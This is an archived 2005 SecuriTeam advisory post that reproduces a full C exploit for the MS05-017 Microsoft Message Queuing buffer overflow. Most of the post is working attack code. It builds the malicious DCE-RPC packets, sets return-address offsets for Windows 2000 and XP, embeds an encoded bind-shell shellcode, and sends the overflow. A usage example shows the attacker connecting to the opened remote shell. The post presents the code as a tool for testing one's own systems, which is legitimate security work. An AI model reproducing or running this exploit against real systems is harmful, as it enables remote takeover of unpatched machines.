[EXPL] Vulnerability in Message Queuing Allows Code Execution (MS05-017, Exploit 2)

• Previous message: SecuriTeam: "[EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 30 Jun 2005 15:26:32 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Vulnerability in Message Queuing Allows Code Execution (MS05-017, Exploit
2)
------------------------------------------------------------------------

SUMMARY

As we recently reported (
<http://www.securiteam.com/windowsntfocus/5BP0B0UFGY.html> Vulnerability
in Message Queuing Allows Code Execution (MS05-017)), a vulnerability in
Microsoft's Message Queuing allows remote attackers to overflow an
internal buffer and cause the execution of arbitrary code. The following
exploit can be used to test your system for the mentioned vulnerability.

DETAILS

Exploit:
/* HOD-ms05017-msmq-expl.c: 2005-05-16: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 houseofdabus.
 *
 * (MS05-017) Message Queuing Buffer Overflow Vulnerability
 * Universal Exploit
 *
 *
 *
 * .::[ houseofdabus ]::.
 *
 *
 *
 * [ <http://www.livejournal.com/users/houseofdabus>
http://www.livejournal.com/users/houseofdabus
 * ---------------------------------------------------------------------
 * Systems Affected:
 * - Windows XP SP1
 * - Windows 2000 SP4
 * - Windows 2000 SP3
 *
 * ---------------------------------------------------------------------
 * Description:
 * A remote code execution vulnerability exists in Message Queuing
 * that could allow an attacker who successfully exploited this
 * vulnerability to take complete control of the affected system.
 *
 * ---------------------------------------------------------------------
 * Solution:
 * <http://www.microsoft.com/technet/security/Bulletin/MS05-017.mspx>
http://www.microsoft.com/technet/security/Bulletin/MS05-017.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 * - Windows XP SP1
 * - Windows XP SP0
 * - Windows 2000 PRO SP4
 * - Windows 2000 PRO SP3
 * - Windows 2000 Server SP4
 * - Windows 2000 AdvServer SP4
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++ : cl -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c
 * Win32/cygwin: gcc -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c
 * Linux : gcc -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05017-msmq-expl 192.168.0.1 2103 HOD 7777
 *
 * [*] Connecting to 192.168.0.22:2103 ... OK
 * [*] Attacking...OK
 *
 * C:\>telnet 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>net stop msmq
 *
 * The Message Queuing service was stopped successfully.
 *
 * C:\WINNT\system32>net start msmq
 * The Message Queuing service is starting..
 * The Message Queuing service was started successfully.
 *
 * C:\WINNT\system32>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif

#define NOP 0x90
#define _DCE_RPC_BIND 0x0B

typedef struct dce_rpc {
 unsigned char ver;
 unsigned char ver_minor;
 unsigned char pkt_type;
 unsigned char pkt_flags;
 unsigned long data_repres;
 unsigned short frag_len;
 unsigned short auth_len;
 unsigned long caller_id;
} DCE_RPC, *PDCE_RPC;

typedef struct dce_rpc_bind {
 unsigned short max_xmit;
 unsigned short max_recv;
 unsigned long asc_group;
 unsigned long num_con_items;
 unsigned short con_id;
 unsigned short num_trn_items;
 /* unsigned char *interface_uuid; */
 /* unsigned short interface_ver; */
 /* unsigned short interface_ver_min; */
 /* unsigned char *uuid; */
 /* unsigned long syntax_ver; */
} DCE_RPC_BIND, *PDCE_RPC_BIND;

unsigned char dce_rpc_header1[] =
 "\x05\x00\x00\x01\x10\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00"
 "\x00\x04\x00\x00\x00\x00\x09\x00\x01\x00\x00\x00\x01\x00\x00\x00"
 "\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00"
 "\xE4\x07\x00\x00\x00\x00\x00\x00\xE4\x07\x00\x00"
 "\x4F\x00\x53\x00\x3A\x00";
 /* ... Remote NetBIOS name */

unsigned char tag_private[] =
 /* \PRIVATE$\ */
 "\x5C\x00"
 "\x50\x00\x52\x00\x49\x00\x56\x00\x41\x00\x54\x00\x45\x00\x24\x00"
 "\x5C\x00";

unsigned char dce_rpc_header2[] =
 "\x05\x00\x00\x00\x10\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00"
 "\x00\x04\x00\x00\x00\x00\x09\x00";

unsigned char dce_rpc_header3[] =
 "\x05\x00\x00\x02\x10\x00\x00\x00\x04\x04\x00\x00\x00\x00\x00\x00"
 "\xEC\x03\x00\x00\x00\x00\x09\x00";

unsigned char offsets[] =
 /* entry point (jmp over) */
 "\xEB\x08\x90\x90"
 /* for Windows 2000 */
 /* mqsvc.exe - pop reg; pop reg; retn; */
 "\xE9\x14\x40\x00"
 "\x90\x90\x90\x90\x90\x90\x90\x90"

 /* entry point (jmp over) */
 "\xEB\x08\x90\x90"
 /* for Windows 2000 Server/AdvServer */
 /* mqsvc.exe - pop reg; pop reg; retn; */
 "\xE9\x14\x40\x00"
 "\x90\x90\xEB\x1A\x41\x40\x68\x6F\x75\x73\x65\x6F\x66\x64\x61\x62"
 "\x75\x73\x48\x41"
 /* entry point (jmp over) */
 "\xEB\x06\x90\x90"
 /* for Windows XP */
 /* mqsvc.exe - pop reg; pop reg; retn; */
 "\x4d\x12\x00\x01"
 "\x90\x90\x90\x90\x90\x90";

unsigned char bind_shellcode[] =
 "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
 "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
 "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
 "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
 "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
 "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
 "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
 "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
 "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
 "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
 "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
 "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
 "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
 "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
 "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
 "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
 "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
 "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
 "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
 "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
 "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
 "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";

#define SET_PORTBIND_PORT(buf, port) \
 *(unsigned short *)(((buf)+186)) = (port)

int
hex2raw(unsigned char *s, unsigned char *out)
{
 unsigned long i, len, j = 0;
 unsigned long ret = 0;

 len = strlen(s);
 for (i = 0; i < len; i+=2) {
  if ((s[i] >= 0x30) && (s[i] <= 0x39))
   j = s[i] - 0x30;
  else
   j = s[i] - 0x61 + 10;
  j *= 16;
  if ((s[i+1] >= 0x30) && (s[i+1] <= 0x39))
   j += s[i+1] - 0x30;
  else
   j += s[i+1] - 0x61 + 10;
  out[ret] = (unsigned char)j;
  ret++;
 }

return ret;
}

void
inverse(unsigned char *io, unsigned long len)
{
 unsigned long i;
 unsigned char c;

 for (i = 0; i < len/2; i++) {
  c = io[len-i-1];
  io[len-i-1] = io[i];
  io[i] = c;
 }
}

int
encode_uuid(unsigned char *uuid, unsigned char *out)
{
 unsigned long i, len, ret;
 unsigned cnt = 0, ar = 0;
 unsigned char *ptr;

 ptr = uuid;
 len = strlen(uuid);
 for (i = 0; i < len; i++) {
  if (uuid[i] == '-') {
   uuid[i] = '\0';
   if (ar < 3) {
    ret = hex2raw(ptr, out);
    inverse(out, ret);
    out += ret; cnt += ret;
   }
   else {
    ret = hex2raw(ptr, out);
    out += ret; cnt += ret;
   }
   ptr = uuid+i+1;
   ar++;
  }
 }
 out[len] = '\0';

 ret = hex2raw(ptr, out);
 out += ret; cnt += ret;

return cnt;
}

unsigned char *
dce_rpc_bind(
 unsigned long cid,
 unsigned char *uuid,
 unsigned short ver,
 unsigned long *pkt_len)
{
 unsigned char vuid[] = "8a885d04-1ceb-11c9-9fe8-08002b104860";
 unsigned char *pkt, *euuid, *tmp;
 unsigned long cnt;
 unsigned short ret;
 PDCE_RPC_BIND rpc_bind;
 PDCE_RPC rpc;

 pkt = (unsigned char *)calloc(2048, 1);
 euuid = (unsigned char *)calloc(strlen(uuid)/2+2, 1);

 tmp = pkt;
 pkt += sizeof(DCE_RPC);
 rpc_bind = (PDCE_RPC_BIND)pkt;
 rpc_bind->max_xmit = 0x16D0;
 rpc_bind->max_recv = 0x16D0;
 rpc_bind->asc_group = 0;
 rpc_bind->num_con_items = 1;
 rpc_bind->con_id = 0;
 rpc_bind->num_trn_items = 1;

 pkt += sizeof(DCE_RPC_BIND);

 cnt = encode_uuid(uuid, pkt);
 pkt += cnt;
 memcpy(pkt, &ver, sizeof(short));
 pkt += sizeof(short);
 *pkt++ = 0; *pkt++ = 0;
 cnt = encode_uuid(vuid, pkt);
 pkt += cnt;
 *pkt++ = 2; *pkt++ = 0;

 ret = pkt - tmp;
 rpc = (PDCE_RPC)tmp;
 rpc->ver = 5;
 rpc->ver_minor = 0;
 rpc->pkt_type = _DCE_RPC_BIND;
 rpc->pkt_flags = 3;
 rpc->data_repres = 16;
 rpc->frag_len = ret + 2;
 rpc->auth_len = 0;
 rpc->caller_id = cid;

 *pkt_len = ret + 2;
 free(euuid);

return tmp;
}

void
convert_name(char *out, char *name)
{
 unsigned long len;

 len = strlen(name);
 out += len * 2 - 1;
 while (len--) {
  *out-- = '\x00';
  *out-- = name[len];
 }
}

int
main (int argc, char **argv)
{

 unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
 unsigned char *packet = NULL;
 unsigned short bindport;
 unsigned long cnt;
 struct sockaddr_in addr;
 struct hostent *he;
 int len;
 int sockfd;
 char recvbuf[4096];
 char *buff, *ptr;
#ifdef _WIN32
 WSADATA wsa;
#endif

 printf("\n (MS05-017) Message Queuing Buffer Overflow
Vulnerability\n\n");
 printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");

 if (argc < 5) {
  printf("%s <host> <port> <netbios name> <bind port>\n", argv[0]);
  printf("\nMSMQ ports: 2103, 2105, 2107\n");
  exit(0);
 }

#ifdef _WIN32
 WSAStartup(MAKEWORD(2,0), &wsa);
#endif

 if ((he = gethostbyname(argv[1])) == NULL) {
  printf("[-] Unable to resolve %s\n", argv[1]);
  return 0;
 }

 if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  printf("[-] create socket failed\n");
  exit(0);
 }

 addr.sin_family = AF_INET;
 addr.sin_port = htons((short)atoi(argv[2]));
 addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(addr.sin_zero), '\0', 8);

 printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
 if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) <
0) {
  printf("\n[-] connect failed!\n");
  exit(0);
 }
 printf("OK\n");

 packet = dce_rpc_bind(0, endp, 1, &cnt);

 if (send(sockfd, packet, cnt, 0) == -1) {
  printf("[-] send failed\n");
  exit(0);
 }

 len = recv(sockfd, recvbuf, 4096, 0);
 if (len <= 0) {
  printf("[-] recv failed\n");
  exit(0);
 }
 free(packet);

 printf("[*] Attacking...");

 buff = (char *) malloc(4172);
 memset(buff, NOP, 4172);

 ptr = buff;
 memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
 ptr += sizeof(dce_rpc_header1)-1;

 // Remote NetBIOS name
 convert_name(ptr, argv[3]);
 ptr += strlen(argv[3])*2;

 memcpy(ptr, tag_private, sizeof(tag_private)-1);
 ptr += sizeof(tag_private)-1;

 memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
 memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
 memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

 // offsets
 ptr += 346;
 memcpy(ptr, offsets, sizeof(offsets)-1);
 ptr += sizeof(offsets)-1;

 // shellcode
 bindport = (unsigned short)atoi(argv[4]);
 bindport ^= 0x0437;
 SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
 memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

 buff[4170] = '\0';
 buff[4171] = '\0';

 if (send(sockfd, buff, 4172, 0) == -1) {
  printf("\n[-] send failed\n");
  exit(0);
 }
 printf("OK\n");

return 0;
}

ADDITIONAL INFORMATION

The information has been provided by
<http://www.livejournal.com/users/houseofdabus/> houseofdabus.
The original article can be found at:
<http://www.livejournal.com/users/houseofdabus/>
http://www.livejournal.com/users/houseofdabus/
Related article can be found at:
<http://www.securiteam.com/windowsntfocus/5BP0B0UFGY.html> Vulnerability
in Message Queuing (MS05-017)

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]